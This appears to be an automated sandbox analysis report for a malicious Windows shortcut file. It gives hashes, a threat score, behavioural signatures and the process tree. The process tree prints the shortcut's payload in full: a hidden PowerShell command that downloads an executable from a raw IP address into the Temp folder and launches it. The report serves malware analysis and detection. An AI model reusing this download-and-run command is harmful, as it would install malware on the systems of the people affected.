Analysis
-
max time kernel
15s -
max time network
22s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
16/01/2025, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
WB-ABS-240730-NEW.lnk
Resource
win7-20240729-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
WB-ABS-240730-NEW.lnk
Resource
win10v2004-20241007-en
25 signatures
150 seconds
General
-
Target
WB-ABS-240730-NEW.lnk
-
Size
2KB
-
MD5
fb1f82957abd04d7fc7821770bcc0ace
-
SHA1
f1791fbc7da30766c1938336275447b791763c83
-
SHA256
7dc2e910ac868412c616ef80d20c76e059c1962b023ca51d8c319185aa0bcbcb
-
SHA512
a1550140664e9a99f4af64a1786c35d36d6ed8f4399391d6616bd7a00f070393982c668a18b2064c88aeee42f9aaf0f56460a79d1c05f00105e22317823a0820
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2800 powershell.exe 2800 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2800 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2800 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1660 wrote to memory of 2800 1660 cmd.exe 30 PID 1660 wrote to memory of 2800 1660 cmd.exe 30 PID 1660 wrote to memory of 2800 1660 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\WB-ABS-240730-NEW.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://147.124.216.113/king.exe -OutFile C:\Users\Admin\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\Admin\AppData\Local\Temp\file.exe' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-